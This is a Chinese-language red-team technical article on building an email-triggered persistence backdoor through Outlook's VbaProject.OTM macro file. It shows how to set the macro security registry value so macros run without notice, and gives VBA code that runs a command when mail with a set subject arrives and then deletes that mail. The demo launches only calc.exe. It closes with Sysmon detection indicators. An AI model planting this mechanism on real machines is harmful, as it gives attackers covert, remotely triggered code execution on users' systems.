技术分享：看我如何利用Outlook来创建基于电子邮件的持久化后门

写在前面的话

技术分析

宏武器化

持久化PoC

PoC演示

检测

写在前面的话

使用低等级用户权限来实现持久化感染，是一种非常有价值的技术，因此我们打算在这篇文章中，跟大家介绍这种基于Outlook的持久化技术。值得一提的是，目前来说这种技术还没有被红队和蓝队所关注。

实际上，基于Outlook的持久化技术在此之前就已经被提到过很多次了，包括Dave Hartley和Nick Landers之前所作的工作，他们详细介绍了如何使用Outlook的规则来实现持久化。但是，在这篇文章中，我们将重点介绍如何使用Outlook的VbsProject.OTM文件来实现持久化。据我们所知，虽然了解这项技术的人不多，但Cobalt Kitty已将其用作命令和控制信道了。

技术分析

跟大多数的Microsoft Office产品一样，Outlook也可以启用开发者选项，并通过VB编辑器来创建基于VBA的宏。打开编辑器，然后创建一个简单的宏文件，你将会看到一个名为“ThisOutlookSession”的Outlook模块：

保存这个宏之后，一个VbaProject.OTM文件将会在“%APPDATA%\Roaming\Microsoft\Outlook ”目录中被创建：

在默认配置下是无法执行这个宏的，因为默认配置为“除了已签名的宏之外，其他所有的宏都被禁用”。

但是，我们可以通过使用以下值创建Security注册表项来修改此配置：

Level值定义的是宏安全配置，包含下列值：

4 = Disable all macros without notification3 = Notifications for digitally signed macros, all other macros disabled2 = Notifications for all macros1 = Enable all Macros

如果想允许宏以隐蔽方式运行而不通知用户的话，我们需要设置“Level”值以在操作期间启用所有宏。

通过检查VbaProject.OTM文件，我们发现它是标准的Microsoft复合文档文件（CDF）：

dmc@deathstar ~  ✗ file ~/VbaProject.OTMVbaProject.OTM: Composite Document File V2 Document, Cannot read section info

对oledump.py进行深入分析后，我们发现了包含宏代码的OLE数据流：

dmc@deathstar ~  ✗ python oledump.py ~/VbaProject.OTM1:        43 'OutlookProjectData'2:       388 'OutlookVbaData/PROJECT'3:        59 'OutlookVbaData/PROJECTwm'4: M    6156 'OutlookVbaData/VBA/ThisOutlookSession'5:      2663 'OutlookVbaData/VBA/_VBA_PROJECT'6:       497 'OutlookVbaData/VBA/dir'

现在，我们已经知道VbaProject.OTM是一个启用了标准OLE宏的文档，因此创建、混淆、清除和重载这些文件的传统工具和技术仍然适用。接下来，我们看看如何将其转换成一种持久化武器。

宏武器化

为了让这种VBA代码执行技术转换成对我们有用的东西，我们需要将代码作为事件的结果执行。ThisOutlookSession模块允许我们订阅Outlook中的各种事件，这就是我们实现代码执行的一个可用元素了。

针对持久化来说，目标事件的潜在选项包括用户驱动的某些事件，比如说Outlook打开或用户自行操作的某些事件，例如指定的邮件送达等等。对于我们的场景，我们将主要研究如何利用带有特定主题的邮件来执行任意的VBA。

为了确认新邮件的接收时间，我们可以在Outlook启动时首先订阅默认收件箱的相关事件。首先，在注册事件的同时在默认收件箱文件夹(olInboxItems)中设置变量：

Option ExplicitPrivate WithEvents olInboxItems As ItemsPrivate Sub Application_Startup()Set olInboxItems = Session.GetDefaultFolder(olFolderInbox).ItemsEnd Sub

为了使用指向用户收件箱的引用，我们可以使用“ItemAdd”回调来接收新消息抵达事件：

Private Sub olInboxItems_ItemAdd(ByVal Item As Object)End Sub

具体说来，我们只对接收的电子邮件感兴趣，因此我们需要对回调进行优化，只允许新邮件来触发我们的事件。这里可以通过验证邮件类型是否为“MailItem”来实现：

Private Sub olInboxItems_ItemAdd(ByVal Item As Object)  If TypeOf Item Is MailItem ThenMsgBox "You have mail"End IfEnd Sub

当然了，我们并不需要每一封接收到的邮件都触发我们的事件，所以我们需要对邮件地址、主题和正文内容等进行过滤：

Private Sub olInboxItems_ItemAdd(ByVal Item As Object)On Error Resume NextDim olMailItem As MailItemIf TypeOf Item Is MailItem ThenIf InStr(olMailItem.Subject, "MDSec") > 0 ThenMsgBox "Hack The Planet"olMailItem.DeleteEnd IfEnd IfSet Item = NothingSet olMailItem = NothingEnd Sub

持久化PoC

综上所属，让我们来弹个计算器（calc.exe）试试：

Option ExplicitPrivate WithEvents olInboxItems As ItemsPrivate Sub Application_Startup()Set olInboxItems = Session.GetDefaultFolder(olFolderInbox).ItemsEnd SubPrivate Sub olInboxItems_ItemAdd(ByVal Item As Object)On Error Resume NextDim olMailItem As MailItemIf TypeOf Item Is MailItem ThenIf InStr(olMailItem.Subject, "MDSec") > 0 ThenMsgBox "Hack The Planet"Shell "calc.exe"olMailItem.DeleteEnd IfEnd IfSet Item = NothingSet olMailItem = NothingEnd Sub

PoC演示

检测

从目标设备的角度来看，我们可以通过下列两个关键指标来检测这种攻击技术：

监控“%APPDATA%\Roaming\Microsoft\Outlook\VbaProject.OTM”文件的创建和修改事件（Sysmon 事件 ID 11）；
监控“HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security”注册表键值的创建和修改事件(Sysmon 事件 ID 12)；